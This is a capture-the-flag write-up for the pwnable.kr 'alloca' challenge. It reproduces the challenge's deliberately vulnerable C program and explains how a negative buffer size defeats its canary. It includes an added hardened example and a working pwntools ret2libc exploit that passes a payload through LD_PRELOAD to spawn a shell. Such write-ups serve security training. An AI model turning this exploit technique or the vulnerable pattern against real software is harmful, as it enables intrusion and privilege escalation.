  • [pwnable.kr]--alloca

    0x00:

    Haven't played in a long time... not since last October TAT. Over the last few days I filled in the gaps left in peach and winafl, so now it's time to do some pwn.

    0x01:

    This program comes with its source code:

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>    // sleep()
    #include <alloca.h>    // alloca()
    
    // Drain stdin up to and including the next newline.
    void clear_newlines(){
        int c;
        do{
            c = getchar();
        }while (c != '\n' && c != EOF);
    }
    
    int g_canary;
    int check_canary(int canary){
        int result = canary ^ g_canary;
        int canary_after = canary;
        int canary_before = g_canary;
        printf("canary before using buffer : %d\n", canary_before);
        printf("canary after using buffer : %d\n\n", canary_after);
        if(result != 0){
            printf("what the f...??? how did you fucked this buffer????\n");
        }
        else{
            printf("I told you so. its trivially easy to prevent BOF :)\n");
            printf("therefore as you can see, it is easy to make secure software\n");
        }
        return result;
    }
    
    int size;
    char* buffer;
    int main(){
    
        printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n");
        sleep(2);
        printf("   1. allocate the buffer size only as you need it\n");
        printf("   2. know your buffer size and limit the input length\n\n");
    
        printf("- simple right?. let me show you.\n\n");
        sleep(2);
    
        printf("- whats the maximum length of your buffer?(byte) : ");
        scanf("%d", &size);                // signed, never range-checked
        clear_newlines();
    
        printf("- give me your random canary number to prove there is no BOF : ");
        scanf("%d", &g_canary);
        clear_newlines();
    
        printf("- ok lets allocate a buffer of length %d\n\n", size);
        sleep(1);
    
        buffer = alloca( size + 4 );    // 4 is for canary
    
        printf("- now, lets put canary at the end of the buffer and get your data\n");
        printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size);
        printf("- if canary is not changed, we can prove there is no BOF :)\n");
        printf("$ ");
    
        memcpy(buffer+size, &g_canary, 4);    // canary will detect overflow.
        fgets(buffer, size, stdin);        // there is no way you can exploit this.
    
        printf("\n");
        printf("- now lets check canary to see if there was overflow\n\n");
    
        check_canary( *((int*)(buffer+size)) );
        return 0;
    }
    
    

    The main task is still to get past its protections and obtain a shell.
    Let's look at which protections the binary has enabled:

    Debugging showed that when check_canary() returns, the return address can be controlled if g_canary is set appropriately.

    Then I got stuck here... NX is enabled, so only a ROP approach would work, but I didn't know where to place the ROP chain.
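    The whole problem sits in the two lines scanf("%d", &size) and alloca(size + 4): size is a signed int that is never range-checked, so a negative value passes straight into alloca(). The following is an added example (not the challenge's own code and not the author's) showing the arithmetic the challenge performs on that input beside a checked version of the buffer-plus-canary step; the function names and the 4096-byte cap are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_BUFFER 4096   /* assumed upper bound on accepted sizes */

/* Mirrors the challenge's arithmetic: on the 32-bit binary alloca(size + 4)
 * receives size + 4 as an unsigned 32-bit quantity, so a negative size
 * turns into an enormous request (and, since alloca only moves the stack
 * pointer, into a buffer that is not inside the intended frame at all). */
unsigned int requested_bytes(int size) {
    return (unsigned int)size + 4u;
}

/* Checked replacement for the scanf("%d") -> alloca() path: returns 1 and
 * stores a usable size_t when size is positive and bounded, 0 otherwise. */
int validate_size(long size, size_t *out) {
    if (size <= 0 || size > MAX_BUFFER)
        return 0;
    *out = (size_t)size;
    return 1;
}

/* Hardened version of the buffer + canary step. `input` stands in for the
 * bytes fgets() would read from stdin. Returns 0 when the size is rejected,
 * 1 when the canary survived, -1 if the canary was clobbered (which the
 * bounded copy below is meant to make impossible). */
int read_with_canary(long size_in, const char *input, int canary) {
    size_t size;
    if (!validate_size(size_in, &size))
        return 0;

    char *buffer = malloc(size + sizeof canary);
    if (buffer == NULL)
        return 0;

    memcpy(buffer + size, &canary, sizeof canary);

    /* Same contract as fgets(buffer, size, stdin): at most size - 1 bytes
     * of data plus a terminating NUL, never touching buffer[size]. */
    size_t n = strlen(input);
    if (n > size - 1)
        n = size - 1;
    memcpy(buffer, input, n);
    buffer[n] = '\0';

    int canary_after;
    memcpy(&canary_after, buffer + size, sizeof canary_after);
    free(buffer);
    return (canary_after ^ canary) == 0 ? 1 : -1;
}

int main(void) {
    /* The value the write-up sends (-92) as the challenge would see it. */
    printf("alloca request for size -92: %u bytes\n", requested_bytes(-92));
    printf("size -92 accepted by checked version: %d\n",
           read_with_canary(-92, "AAAA", 1234) != 0);
    printf("size 16, oversized input, canary intact: %d\n",
           read_with_canary(16, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 1234));
    return 0;
}
```

    The point of validate_size() is that the sign check happens before the value reaches any allocator or fgets(); once a negative int has been handed to alloca(), no canary placed relative to that buffer can tell you anything useful, because the buffer itself is no longer where the program thinks it is.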

    0x02:

    Later I looked at other people's solutions and realised this is a local exploit... the routine I learned from playing overthewire applies directly: put the shellcode in an environment variable, determine its address, then change the return address to point there.
    But first, use ulimit -s unlimited to pin the libc load address; only then can the addresses of system() and /bin/sh be determined.

    Attached is the exp from my local debugging; your environment will differ, so the addresses may differ too.

    from pwn import *
    import os
    
    off_system  = 0x0003d3e0    # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system
    off_shell   = 0x0015ea69    # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6
    adr_libc    = 0x40047000    # ldd alloca
    adr_payload = 0x40025857    # searchmem "AAAA"
    
    payload     =   p32(adr_libc + off_system)
    payload     +=  p32(0xdeadbeef)
    payload     +=  p32(adr_libc + off_shell)
    
    #test = "AAAABBBBCCCC"
    #p = process('./alloca', env = {'LD_PRELOAD': test})
    p = process('./alloca', env = {'LD_PRELOAD': payload})
    #raw_input("$$")
    p.sendline(str(-92))                   
    p.sendline(str((adr_payload + 4) ^ 0x08048250))
    p.interactive()
    
    '''
    0x40025857 ^ 0x08048250 --> 0x4806da07
    Cannot access memory at address 0x4806da03
    0x40025857 + 4
    '''
    
    

    0x03: References

    http://0byjwzsf.me/2016/08/08/pwnable-rookiss-alloca/#more

  • Original URL: https://www.cnblogs.com/0xmuhe/p/5770806.html